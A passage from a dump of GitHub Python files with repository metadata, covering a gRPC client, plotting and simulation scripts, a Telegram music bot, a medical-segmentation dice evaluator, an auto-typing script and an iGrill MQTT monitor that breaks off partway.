ClientTest():\n def __init__(self,port='localhost:50051',image_output='client_out'):\n\t self.port = port\n\t self.image_output = image_output\n def open_grpc_channel(self):\n channel = grpc.insecure_channel(self.port)\n stub = detect_image_pb2_grpc.ImageDemoStub(channel)\n return stub\n def send_request(self, stub, img):\n out_file_name = self.image_output+'.png'\n img = img\n img = img.resize((480,320))\n img_b = img.tobytes() \n Image = detect_image_pb2.InputImage(Image =img_b)\n response = stub.DetectImage(Image)\n image = Image.frombytes(data=response.Image,size=(480,320),mode='RGB')\n return image\n\n#make the call \n\n# print(type(response.Image))\n\n","repo_name":"samimideksa/All-In-One","sub_path":"Service/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"93"} +{"seq_id":"6970704470","text":"\nimport json\nfrom time import 
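Editor's note on the PendulumSpringClass.py record above: it mixes attribute names (pos vs position, vel vs velocity), defines UpdateAcceleration without self, and ends with plt.shwow(); as written it cannot run. A hedged sketch of a consistent semi-implicit Euler step for a plain pendulum bob; all names here are hypothetical, and the centripetal term is deliberately omitted, so positions drift slowly over long runs:

import math

class PointPendulum:
    """Planar pendulum bob, tangential gravity only, semi-implicit Euler."""
    def __init__(self, length=1.0, theta=math.pi / 9, g=9.81):
        self.pos = [length * math.sin(theta), -length * math.cos(theta)]
        self.vel = [0.0, 0.0]
        self.g = g

    def acceleration(self):
        theta = math.atan2(self.pos[0], -self.pos[1])  # angle from vertical
        a = -self.g * math.sin(theta)                  # tangential magnitude
        return [a * math.cos(theta), a * math.sin(theta)]

    def step(self, dt):
        acc = self.acceleration()
        self.vel = [v + a * dt for v, a in zip(self.vel, acc)]
        self.pos = [p + v * dt for p, v in zip(self.pos, self.vel)]

pendulum = PointPendulum()
for _ in range(100):
    pendulum.step(0.01)
print(pendulum.pos)  # bob position after one simulated second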
sleep\nfrom flexweb import store_transaction, store\nfrom urllib.parse import parse_qsl\n\ndef flexweb_handler(env):\n\n kv = dict(parse_qsl(env.args[b'qs']))\n if kv[b'op'] == b\"write\":\n data = json.loads(env.args[b'body'].decode())\n s = []\n w = []\n r = []\n s.append(store_transaction(env))\n s.append(store_transaction(env))\n idx = 0\n for k in data:\n w.append(s[idx].write(k, data[k].encode('utf-8')))\n r.append(s[idx].read(k).decode())\n\n idx = (idx + 1) % 2\n\n s[0].commit()\n s[1].commit()\n return json.dumps({'w': w, 'r': r})\n elif kv[b'op'] == b\"read\":\n s = store(env)\n return s.read(kv[b'k'].decode()).decode()\n","repo_name":"vincentsmh/flexweb","sub_path":"flexweb/apps/flexweb/test/python/test_multi_transactions.py","file_name":"test_multi_transactions.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"42344406221","text":"from pydantic import BaseModel\nfrom typing import List, Optional\nfrom bson.objectid import ObjectId\n\n\nclass PydanticObjectId(ObjectId):\n @classmethod\n def __get_validators__(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, value: ObjectId | str) -> ObjectId:\n if value:\n try:\n ObjectId(value)\n except ValueError:\n raise ValueError(f\"Not a valid object id: {value}\")\n return value\n\n\nclass BoosterSetIn(BaseModel):\n name: str\n description: Optional[str]\n ratio: dict\n mv: list\n normals: list\n rares: list\n super_rares: list\n ultra_rares: list\n created_on: dict\n updated_on: dict\n all_cards: Optional[List]\n cover_image: Optional[str]\n\n\nclass BoosterSet(BoosterSetIn):\n id: PydanticObjectId\n\n\nclass BoosterSetOut(BoosterSetIn):\n id: str\n\n\nclass BoosterSetsAll(BaseModel):\n booster_sets: List\n","repo_name":"Gogorenascence/pm-deck-app","sub_path":"api/models/booster_sets.py","file_name":"booster_sets.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"25172960616","text":"\n# coding: utf-8\n\n# In[4]:\n\n\nget_ipython().magic('matplotlib inline')\nimport matplotlib.pyplot as plt\nimport autograd.numpy as np\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.colors import LogNorm\nfrom matplotlib import animation\nfrom IPython.display import HTML\n\nfrom autograd import elementwise_grad, value_and_grad\nfrom scipy.optimize import minimize\nfrom collections import defaultdict\nfrom itertools import zip_longest\nfrom functools import partial\n\n\n# In[5]:\n\n\nf = lambda x, y: (1.5 - x + x*y)**2 + (2.25 - x + x*y**2)**2 + (2.625 - x + x*y**3)**2\nxmin, xmax, xstep = -4.5, 4.5, .2\nymin, ymax, ystep = -4.5, 4.5, .2\nx, y = np.meshgrid(np.arange(xmin, xmax + xstep, xstep), np.arange(ymin, ymax + ystep, ystep))\nz = f(x, y)\nminima = np.array([3., .5])\nf(*minima)\nminima_ = minima.reshape(-1, 1)\nminima_\n\n\n# In[6]:\n\n\n# 3D surface plot\nfig = plt.figure(figsize=(8, 5))\nax = plt.axes(projection='3d', elev=50, azim=-50)\n\nax.plot_surface(x, y, z, norm=LogNorm(), rstride=1, cstride=1, \n edgecolor='none', alpha=.8, cmap=plt.cm.jet)\nax.plot(*minima_, f(*minima_), 'r*', markersize=10)\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\nax.set_zlabel('$z$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\nplt.show()\n\n\n# In[7]:\n\n\ndz_dx = elementwise_grad(f, argnum=0)(x, y)\ndz_dy = elementwise_grad(f, argnum=1)(x, y)\n\nfig, ax = plt.subplots(figsize=(10, 6))\n\nax.contour(x, y, z, 
levels=np.logspace(0, 5, 35), norm=LogNorm(), cmap=plt.cm.jet)\nax.quiver(x, y, x - dz_dx, y - dz_dy, alpha=.5)\nax.plot(*minima_, 'r*', markersize=18)\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\nplt.show()\n\n\n# In[8]:\n\n\n# Newton-CG method\nx0 = np.array([3., 4.])\nfunc = value_and_grad(lambda args: f(*args))\nres = minimize(func, x0=x0, method='Newton-CG',jac=True, tol=1e-20, callback=print)\n\n\n# In[9]:\n\n\ndict(res)\n\n\n# In[10]:\n\n\ndef make_minimize_cb(path=[]):\n \n def minimize_cb(xk):\n # note that we make a deep copy of xk\n path.append(np.copy(xk))\n\n return minimize_cb\n\n\n# In[11]:\n\n\npath_ = [x0]\nres = minimize(func, x0=x0, method='Newton-CG',jac=True, tol=1e-20, callback=make_minimize_cb(path_))\ndict(res)\n\n\n# In[12]:\n\n\npath = np.array(path_).T\npath.shape\n\n\n# In[13]:\n\n\nfig, ax = plt.subplots(figsize=(10, 6))\n\nax.contour(x, y, z, levels=np.logspace(0, 5, 35), norm=LogNorm(), cmap=plt.cm.jet)\nax.quiver(path[0,:-1], path[1,:-1], path[0,1:]-path[0,:-1], path[1,1:]-path[1,:-1], scale_units='xy', angles='xy', scale=1, color='k')\nax.plot(*minima_, 'r*', markersize=18)\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\n\n# In[14]:\n\n\nfig = plt.figure(figsize=(8, 5))\nax = plt.axes(projection='3d', elev=50, azim=-50)\n\nax.plot_surface(x, y, z, norm=LogNorm(), rstride=1, cstride=1, edgecolor='none', alpha=.8, cmap=plt.cm.jet)\nax.quiver(path[0,:-1], path[1,:-1], f(*path[::,:-1]), \n path[0,1:]-path[0,:-1], path[1,1:]-path[1,:-1], f(*(path[::,1:]-path[::,:-1])), \n color='k')\nax.plot(*minima_, f(*minima_), 'r*', markersize=10)\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\nax.set_zlabel('$z$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\n\n# In[15]:\n\n\nfig, ax = plt.subplots(figsize=(10, 6))\n\nax.contour(x, y, z, levels=np.logspace(0, 5, 35), norm=LogNorm(), cmap=plt.cm.jet)\nax.plot(*minima_, 'r*', markersize=18)\n\nline, = ax.plot([], [], 'b', label='Newton-CG', lw=2)\npoint, = ax.plot([], [], 'bo')\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\nax.legend(loc='upper left')\n\n\n# In[16]:\n\n\ndef init():\n line.set_data([], [])\n point.set_data([], [])\n return line, point\n\ndef animate(i):\n line.set_data(*path[::,:i])\n point.set_data(*path[::,i-1:i])\n return line, point\n\n\n# In[17]:\n\n\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=path.shape[1], interval=60, \n repeat_delay=5, blit=True)\n\n","repo_name":"hansun1994/Gradient_Descent_Visualization","sub_path":"gradient_descent_visual.py","file_name":"gradient_descent_visual.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"73168897267","text":"import pandas as pd \nimport glob\nimport os \nimport plotly.graph_objects as go\nfrom itertools import cycle\nfrom supervenn import supervenn\nimport seaborn as sns\nimport matplotlib.pyplot as plt \nimport numpy as np\n\n\n\nnotre=\"cov_filtering/notre/\"\nricalib=\"cov_filtering/ricalib/\"\nres_path=\"results_cov/venn_pdfs/\"\n\ninit= [\"Carbon_POL\", \"Carbon_TOT\", \"mock_POL\", \"mock_TOT\", \"Proton_POL\", \"Proton_TOT\", \"X-ray_POL\", \"X-ray_TOT\"]\n\nfor i in range(2):\n\tfolder = notre\n\tif i == 1 :\n\t\tfolder = ricalib\n\n\tfor b in init :\n\t\tfil10 = glob.glob(folder+b+'*.10filtered')\n\t\tfil20 = 
glob.glob(folder+b+'*.20filtered')\n\n\t\tsets10=[]\n\t\tfor j in fil10:\n\t\t\tdf = pd.read_csv(j, sep='\\t')\n\t\t\ts = set(df.dbsnp.ravel())\n\t\t\tsets10.append(s)\n\t\t\n\t\tsets20=[]\n\t\tfor j in fil20:\n\t\t\tdf = pd.read_csv(j, sep='\\t')\n\t\t\ts = set(df.dbsnp.ravel())\n\t\t\tsets20.append(s)\n\t\t\n\t\tpdf= res_path+b+\"_\"\n\n\t\tf10=[w[w.rindex(\"/\")+1:] for w in fil10]\n\t\tf20=[w[w.rindex(\"/\")+1:] for w in fil20]\n\n\t\t\n\t\tsupervenn(sets10, f10, widths_minmax_ratio=0.1, min_width_for_annotation=900, col_annotations_area_height=2, rotate_col_annotations=True)\n\n\t\t#plt.show()\n\t\t\n\t\tplt.savefig(pdf+\"10fil\"+'.pdf')\n\n\t\tplt.close()\n\n\t\tsupervenn(sets20, f20, widths_minmax_ratio=0.1, min_width_for_annotation=900, col_annotations_area_height=2, rotate_col_annotations=True)\n\t\tplt.savefig(pdf+\"20fil\"+'.pdf')\n\t\t\n\t\tplt.close()\n\t\t\n","repo_name":"Elisshaze/tesi","sub_path":"venns.py","file_name":"venns.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"12596166896","text":"# © Cyril C Thomas\r\n# https://t.me/cyril_c_10\r\n\r\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup\r\nfrom Song.database.access_db import db\r\nimport shutil\r\nimport psutil\r\n\r\n#-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*#\r\ndef humanbytes(size):\r\n    # https://stackoverflow.com/a/49361727/4723940\r\n    # 2**10 = 1024\r\n    if not size:\r\n        return \"\"\r\n    power = 2 ** 10\r\n    n = 0\r\n    Dic_powerN = {0: ' ', 1: 'Ki', 2: 'Mi', 3: 'Gi', 4: 'Ti'}\r\n    while size > power:\r\n        size /= power\r\n        n += 1\r\n    return str(round(size, 2)) + \" \" + Dic_powerN[n] + 'B'\r\n\r\n#-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*#\r\n\r\nasync def start(bot, update):\r\n    await update.reply_text(\r\n        text=f\"Hi there, {update.from_user.mention} \\n\\nI can download Spotify Songs and Send them Back to You\\n\\nSend me The Link and See the Magic......\\n\\n\\nMade with ❤️ by @c_bots_support\",\r\n        quote=True,\r\n        reply_markup=InlineKeyboardMarkup(\r\n            [[\r\n                InlineKeyboardButton(\r\n                    \"Support Channel\", url=\"https://t.me/c_bots_support\"),\r\n                InlineKeyboardButton(\r\n                    \"DEV Contact\", url=\"https://t.me/c_text_bot\")\r\n            ]]\r\n        ),\r\n        disable_web_page_preview=True,\r\n        parse_mode=\"html\")\r\n\r\n\r\n\r\nasync def helper(bot, update):\r\n    await update.reply_text(\r\n        text=f\"Send Me The Song Link\\n\\nDownload The Music\\n\\nSend as Music File Back to You\\n\\nNot all Music Files Can be Downloaded, So Please be Patient\\n\\nFeel Free to Contact me If you Spot any Bugs\\n\\n\\nMade with ❤️ by @c_bots_support\",\r\n        quote=True,\r\n        reply_markup=InlineKeyboardMarkup(\r\n            [[\r\n                InlineKeyboardButton(\r\n                    \"Support Channel\", url=\"https://t.me/c_bots_support\"),\r\n                InlineKeyboardButton(\r\n                    \"DEV Contact\", url=\"https://t.me/c_text_bot\")\r\n            ]]\r\n        ),\r\n        disable_web_page_preview=True,\r\n        parse_mode=\"html\")\r\n\r\n\r\nasync def status(bot, update):\r\n    total, used, free = shutil.disk_usage(\".\")\r\n    total = humanbytes(total)\r\n    used = humanbytes(used)\r\n    free = humanbytes(free)\r\n    cpu_usage = psutil.cpu_percent()\r\n    ram_usage = psutil.virtual_memory().percent\r\n    disk_usage = psutil.disk_usage('/').percent\r\n    total_users = await db.total_users_count()\r\n    await update.reply_text(\r\n        
text=f\"**Total Disk Space:** {total} \\n**Used Space:** {used}({disk_usage}%) \\n**Free Space:** {free} \\n**CPU Usage:** {cpu_usage}% \\n**RAM Usage:** {ram_usage}%\\n\\n**Total Users in DB:** `{total_users}`\",\r\n parse_mode=\"Markdown\",\r\n quote=True\r\n )\r\n\r\n","repo_name":"10cyrilc/Music-Downloader-Bot","sub_path":"Song/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"93"} +{"seq_id":"40012041644","text":"import os\r\nfrom functools import partial\r\nimport matplotlib.pyplot as plt\r\nimport nibabel as nib\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom train_pct import config\r\n\r\n\r\ndef get_organs_mask(data, index=1):\r\n return data == index\r\n\r\n\r\ndef dice_coefficient(truth, prediction):\r\n if np.sum(truth) == 0:\r\n return np.nan\r\n else:\r\n return 2 * np.sum(truth * prediction) / (np.sum(truth) + np.sum(prediction))\r\n\r\ndef loss_plot(model_dir):\r\n training_file = os.path.join(model_dir, \"training.log\")\r\n training_df = pd.read_csv(training_file).set_index('epoch')\r\n plt.figure()\r\n plt.plot(training_df['loss'].values, label='training loss')\r\n plt.plot(training_df['val_loss'].values, label='validation loss')\r\n plt.ylabel('Loss')\r\n plt.xlabel('Epoch')\r\n plt.xlim((0, len(training_df.index)))\r\n plt.legend(loc='upper right')\r\n plt.savefig(os.path.join(model_dir, \"loss_graph.png\"))\r\n plt.close()\r\n\r\ndef dice_plot(df, file_path):\r\n scores = dict()\r\n for index, score in enumerate(df.columns):\r\n values = df.values.T[index]\r\n scores[score] = values[np.isnan(values) == False]\r\n plt.boxplot(list(scores.values()), labels=list(scores.keys()))\r\n plt.ylabel(\"Dice Coefficient\")\r\n plt.grid()\r\n plt.gca().set_xticklabels(list(scores.keys()), rotation=30, fontsize=8)\r\n plt.savefig(file_path)\r\n plt.close()\r\n\r\n\r\ndef evaluate(data_dir, prediction_dir, header):\r\n masking_functions = [partial(get_organs_mask, index=index + 1) for index in range(len(header))]\r\n dice_rows = list()\r\n subject_ids = list()\r\n patients_list = os.listdir(prediction_dir)\r\n for patient in patients_list:\r\n dice = list()\r\n subject_ids.append(patient)\r\n truth_file = os.path.join(data_dir, patient, \"label.nii.gz\")\r\n truth = nib.load(truth_file).get_data()\r\n prediction_file = os.path.join(prediction_dir, patient, \"label.nii.gz\")\r\n prediction = nib.load(prediction_file).get_data()\r\n dice.extend([dice_coefficient(func(truth), func(prediction)) for func in masking_functions])\r\n dice_rows.append(dice)\r\n return dice_rows, subject_ids\r\n\r\n\r\nif __name__ == \"__main__\":\r\n header = ('Spleen', 'Pancreas', 'Left kidney', 'Gallbladder', 'Esophagus', 'Liver', 'Stomach', 'Duodenum')\r\n Dice = list()\r\n Patients = list()\r\n for i in range(5):\r\n print(\"Evaluating fold\" + str(i) + \"...\")\r\n config[\"model_dir\"] = os.path.join(config[\"result_path\"], config[\"model_name\"] + str(i))\r\n loss_plot(config[\"model_dir\"])\r\n test_data_path = os.path.join(config[\"data_path\"], \"fold\" + str(i))\r\n prediction_path = os.path.join(config[\"model_dir\"], \"prediction\")\r\n dice_rows, subject_ids = evaluate(test_data_path, prediction_path, header)\r\n Dice.extend(dice_rows)\r\n Patients.extend(subject_ids)\r\n df = pd.DataFrame.from_records(Dice, columns=header, index=Patients)\r\n df.to_csv(os.path.join(config[\"result_path\"], \"test_dice_scores.csv\"))\r\n 
df.describe().to_csv(os.path.join(config[\"result_path\"], \"test_dice_statistics.csv\"))\r\n dice_plot(df, os.path.join(config[\"result_path\"], \"test_dice_scores_boxplot.png\"))\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"RoadmapSoftware/CT_organs_dose","sub_path":"code/evaluate_pct.py","file_name":"evaluate_pct.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"93"} +{"seq_id":"19310110924","text":"from collections import deque\nimport pandas as pd\nimport numpy as np\n\nRT_lambda = int(input(\"Input inter-arrival time of RT messages: \"))\nnonRT_lambda = int(input(\"Input inter-arrival time of non RT messages: \"))\nRT_service = int(input(\"Input service time of an RT message: \"))\nnonRT_service = int(input(\"Input service time of a nonRT message: \"))\nmax_MC = int(input(\"Input the maximum Machine clock cycles you want to run the simulation for: \"))\n\n\nclass Simulator:\n def __init__(self, n_RT=0, n_nonRT=0, s=0, SCL=4, MC=0, RTCL=3, nonRTCL=5, preempted_ST = -1, \\\n RT_lambda=10, nonRT_lambda=10, RT_service=4, nonRT_service=4, max_MC= 50):\n self.n_RT = n_RT #number of items in RT queue\n self.n_nonRT = n_nonRT #number of items in non RT queue\n self.s = s #sever status, 0: ideal, 1: servicing RT msg, 2: servicing nonRT msg\n self.SCL = SCL #service clock\n self.MC = MC #master clock\n self.RTCL = RTCL #next RT packet arrival time\n self.nonRTCL = nonRTCL #next non RT packet arrival time\n self.preempted_ST = preempted_ST #pre-empted service time\n self.RT_lambda = RT_lambda #RT msg inter-arrival time\n self.nonRT_lambda = nonRT_lambda #nonRT msg inter-arrival time\n self.RT_service = RT_service #RT service time\n self.nonRT_service = nonRT_service #nonRT service time \n self.RT_queue = deque([]) #store the arrival time of RT msg\n self.nonRT_queue = deque([])\n self.event_list = [[RTCL, 0], [nonRTCL, 1], [SCL, 2]]\n self.max_MC = max_MC\n self.df = pd.DataFrame(columns = ['MC', 'RTCL', 'nonRTCL', 'n_RT', 'n_nonRT', 'SCL', 's', 'preempted_ST'])\n\n def start_simulation(self):\n while self.MC <= self.max_MC:\n \n if any([self.n_RT, self.n_nonRT, self.SCL]):\n if self.preempted_ST == -1:\n self.preempted_ST = \"\"\n current_data = self.simulator_data()\n self.df = self.df.append(pd.Series(current_data, index=self.df.columns), ignore_index=True)\n print(\"MC: {}, RTCL: {}, nonRTCL: {}, nRT: {}, nnonRT: {}, SCL: {}, s: {}, pre-empted: {}\".format(*current_data))\n\t\n if self.preempted_ST == \"\":\n self.preempted_ST = -1\n\n if self.SCL == 0:\n event = min(self.event_list[:2])\n else:\n event = min(self.event_list)\n\n self.MC = event[0]\n if event[1] == 0:\n self.RT_arrival()\n \n elif event[1] == 1:\n self.nonRT_arrival()\n \n elif event[1] == 2:\n self.service_completion()\n\n def RT_arrival(self):\n self.RT_queue.append(self.RTCL)\n self.n_RT += 1\n self.RTCL = self.MC + self.RT_lambda\n self.event_list[0][0] = self.RTCL \n \n if self.n_RT == 1 and self.s!=1:\n self.RT_queue.popleft()\n if self.s == 2:\n self.preempted_ST = self.SCL - self.MC\n if self.preempted_ST > 0: \n self.n_nonRT += 1\n self.nonRT_queue.appendleft(self.preempted_ST + self.MC)\n elif self.preempted_ST == 0:\n self.preempted_ST = -1\n \n self.SCL = self.MC + self.RT_service\n self.event_list[2][0] = self.SCL\n self.n_RT -= 1\n self.s = 1\n\n \n def nonRT_arrival(self):\n self.nonRT_queue.append(self.nonRTCL)\n self.n_nonRT += 1\n self.nonRTCL = self.MC + self.nonRT_lambda\n self.event_list[1][0] = self.nonRTCL \n \n if 
self.n_nonRT == 1:\n if self.s == 0:\n self.nonRT_queue.popleft()\n self.SCL = self.MC + self.nonRT_service\n self.event_list[2][0] = self.SCL\n self.s = 2\n self.n_nonRT -= 1\n \n\n def service_completion(self):\n if len(self.RT_queue) > 0:\n self.SCL = self.MC + self.RT_service\n self.s = 1\n self.n_RT -= 1\n self.RT_queue.popleft()\n \n self.event_list[2][0] = self.SCL\n\n elif len(self.nonRT_queue) > 0:\n self.nonRT_queue.popleft()\n self.n_nonRT -= 1\n self.s = 2\n \n if self.preempted_ST > 0:\n self.SCL = self.MC + self.preempted_ST\n self.preempted_ST = -1\n else:\n self.SCL = self.MC + self.nonRT_service\n \n self.event_list[2][0] = self.SCL\n else:\n self.s = 0\n self.SCL = 0\n self.event_list[2][0] = 0\n\n def simulator_data(self):\n data = [self.MC, self.RTCL, self.nonRTCL, self.n_RT, self.n_nonRT, self.SCL, self.s, self.preempted_ST]\n return data\n \n def write_to_file(self, file_path):\n self.df.to_csv(file_path, index=False)\n\n\nsimulator1 = Simulator(n_RT=0, n_nonRT=0, s=2, SCL=4, MC=0, RTCL=3, nonRTCL=5, preempted_ST=-1, \\\n RT_lambda=RT_lambda, nonRT_lambda=nonRT_lambda, RT_service=RT_service, \n nonRT_service=nonRT_service, max_MC=max_MC)\n\nfile_path1 = 'task2.1_output.csv'\nsimulator1.start_simulation()\nsimulator1.write_to_file(file_path1)\n\ndata = pd.read_csv(file_path1)\nprint(\"\\n\")\nprint(\"OUTPUT TABLE:\")\nprint(data)\n","repo_name":"ayush-bisht/IoT-Analytics","sub_path":"Simulation Task/Task 2/task2.1/task21.py","file_name":"task21.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"13819113450","text":"import json\nfrom graphviz import Digraph\n\nwith open('events.json') as events_file:\n events = json.load(events_file)\n\nhandlers = events[\"handlers\"]\nflows = events[\"flows\"]\npublishable = events[\"publishable\"]\nmissions = events[\"missions\"]\nprocess_conclusion = events[\"process_conclusion\"]\n\ndef is_publishable(name):\n return name in publishable\n\ndef node_event(g, name):\n color = 'lightblue4' if is_publishable(name) else 'lightblue2'\n g.node(name, shape='box', color=color, style='filled')\n\ndef node_handler(g, name):\n g.node(name, color='cornsilk', style='filled')\n\ndef node_flow(g, name):\n g.node(name, color='khaki', style='filled')\n\ndef node_step(g, name):\n g.node(name, color='darkolivegreen3', style='filled')\n\ndef handler_graph(g):\n for entry in handlers:\n handler = entry + ' Handler'\n\n for recv in handlers[entry]['receives']:\n node_event(g, recv)\n node_handler(g, handler)\n g.edge(recv, handler, label='handled by')\n\n for emit in handlers[entry]['emits']:\n node_event(g, emit)\n node_handler(g, handler)\n g.edge(handler, emit, label='emits')\n\n top = \"On Process Completion\"\n for processed in process_conclusion:\n node_event(g, processed)\n node_handler(g, top)\n g.edge(top, processed, label='emits')\n\n g.render()\n\ndef flow_graph(g):\n for entry in flows:\n flow = entry + ' Flow'\n\n for emit in flows[entry]:\n node_event(g, emit)\n node_flow(g, flow)\n g.edge(flow, emit, label='emits')\n\n g.render()\n\ndef mission_graph(g):\n for mission in missions:\n\n with g.subgraph(name='cluster_' + mission) as gm:\n gm.attr(label=mission + ' Mission', color='red')\n\n for step in missions[mission]['steps']:\n step_data = missions[mission]['steps'][step]\n step = step + ' Step'\n\n for filtered in step_data['filters']:\n node_event(gm, filtered)\n node_step(gm, step)\n gm.edge(step, filtered, label='filters')\n\n for 
emit in step_data['emits']:\n                    node_event(gm, emit)\n                    node_step(gm, step)\n                    gm.edge(step, emit, label='emits')\n\n    g.render()\n\n\ng1 = Digraph('events_handler', filename='graphs/events_handler.dot')\ng2 = Digraph('events_flow', filename='graphs/events_flow.dot')\ng3 = Digraph('events_missions', filename='graphs/events_missions.dot')\n\ng1.attr(rankdir='LR')\ng2.attr(rankdir='LR')\ng3.attr(rankdir='LR')\n\nhandler_graph(g1)\nflow_graph(g2)\nmission_graph(g3)\n","repo_name":"HackerExperience/Helix","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"93"} +{"seq_id":"42561763524","text":"\"\"\"Typebot text typer for MacOS, Windows, and Linux - Jack Baumgartel\"\"\"\n\nimport pyautogui\nimport time\n\npyautogui.FAILSAFE = True\n\nstarttime = 20\n\n# Receive the message from the user\n#print('What is your message?\\n')\nmessage = input('What is your message?\\n')\n\n# Split the message into individual words\nwords = message.split()\n\n# Receive the number of repetitions from the user\nrepeats = int(input(\"How many times would you like to repeat this message?\\n\"))\n\n# Instruct the user on operation\nprint('\\nOpen the location you wish to write your message, click in the type area, \\nand wait! The program will start typing your message in {}s. To end the \\nprogram, move your cursor quickly to any corner of your screen!'.format(starttime))\n\n# Delay the start\ntime.sleep(starttime)\n\n# Repeatedly type the message, pressing 'enter' in between each word\nfor j in range(repeats):\n\tfor i in range(len(words)):\n\t\tpyautogui.typewrite(words[i])\n\t\tpyautogui.press(\"enter\")\n\n\n\n\n\n\n\n","repo_name":"Jack-Baumgartel/Typebot-WordbyWord","sub_path":"typebot.py","file_name":"typebot.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"44102950530","text":"from builtins import range\nfrom config import strip_config\nfrom config import Config\nimport argparse\nfrom igrill import IGrillMiniPeripheral, IGrillV2Peripheral, IGrillV3Peripheral, Pulse2000Peripheral, DeviceThread\nimport logging\nimport paho.mqtt.client as mqtt\nimport boto3\nimport time\n\nconfig_requirements = {\n    'specs': {\n        'required_entries': {'devices': list, 'mqtt': dict},\n    },\n    'children': {\n        'devices': {\n            'specs': {\n                'required_entries': {'name': str, 'type': str, 'address': str, 'topic': str, 'interval': int},\n                'optional_entries': {'publish_missing_probes': bool, 'missing_probe_value': str},\n                'list_type': dict\n            }\n        },\n        'mqtt': {\n            'specs': {\n                'required_entries': {'host': str,\n                                     'aws_cloudwatch_metrics': bool},\n                'optional_entries': {'port': int,\n                                     'keepalive': int,\n                                     'auth': dict,\n                                     'tls': dict}\n            },\n            'children': {\n                'auth': {\n                    'specs': {\n                        'required_entries': {'username': str},\n                        'optional_entries': {'password': str}\n                    }\n                },\n                'tls': {\n                    'specs': {\n                        'optional_entries': {'ca_certs': str,\n                                             'certfile': str,\n                                             'keyfile': str,\n                                             'cert_reqs': str,\n                                             'tls_version': str,\n                                             'ciphers': str}\n                    }\n                }\n            }\n        }\n    }\n}\n\nconfig_defaults = {\n    'mqtt': {\n        'host': 'localhost'\n    }\n}\n\n
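# A config sketch (illustrative values, not from this project) that would\n# satisfy config_requirements above once parsed into Python types:\n#\n#   devices:\n#     - name: grill\n#       type: igrill_v2\n#       address: 70:91:8F:00:00:00\n#       topic: bbq/grill\n#       interval: 15\n#   mqtt:\n#     host: localhost\n#     aws_cloudwatch_metrics: false\n\n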
parser = argparse.ArgumentParser(description='Monitor bluetooth igrill devices, and export to MQTT')\nparser.add_argument('-c', '--config', action='store', dest='config_directory', default='.',\n                    help='Set config directory, default: \\'.\\'')\nparser.add_argument('-l', '--log-level', action='store', dest='log_level', default='INFO',\n                    help='Set log level, default: \\'info\\'')\nparser.add_argument('-d', '--log-destination', action='store', dest='log_destination', default='',\n                    help='Set log destination (file), default: \\'\\' (stdout)')\nparser.add_argument('--configtest', help='Parse config only',\n                    action=\"store_true\")\noptions = parser.parse_args()\n\n\ndef log_setup(log_level, logfile):\n    \"\"\"Setup application logging\"\"\"\n\n    numeric_level = logging.getLevelName(log_level.upper())\n    if not isinstance(numeric_level, int):\n        raise TypeError(\"Invalid log level: {0}\".format(log_level))\n\n    if logfile != '':\n        logging.info(\"Logging redirected to: {0}\".format(logfile))\n        # Need to replace the current handler on the root logger:\n        file_handler = logging.FileHandler(logfile, 'a')\n        formatter = logging.Formatter('%(asctime)s %(threadName)s %(levelname)s: %(message)s')\n        file_handler.setFormatter(formatter)\n\n        log = logging.getLogger()  # root logger\n        for handler in log.handlers:  # remove all old handlers\n            log.removeHandler(handler)\n        log.addHandler(file_handler)\n\n    else:\n        logging.basicConfig(format='%(asctime)s %(threadName)s %(levelname)s: %(message)s')\n\n    logging.getLogger().setLevel(numeric_level)\n    logging.info(\"log_level set to: {0}\".format(log_level))\n\n\ndef mqtt_init(mqtt_config):\n    \"\"\"Setup mqtt connection\"\"\"\n    mqtt_client = mqtt.Client()\n\n    if 'auth' in mqtt_config:\n        auth = mqtt_config['auth']\n        mqtt_client.username_pw_set(**auth)\n\n    if 'tls' in mqtt_config:\n        if mqtt_config['tls']:\n            tls_config = mqtt_config['tls']\n            mqtt_client.tls_set(**tls_config)\n        else:\n            mqtt_client.tls_set()\n\n    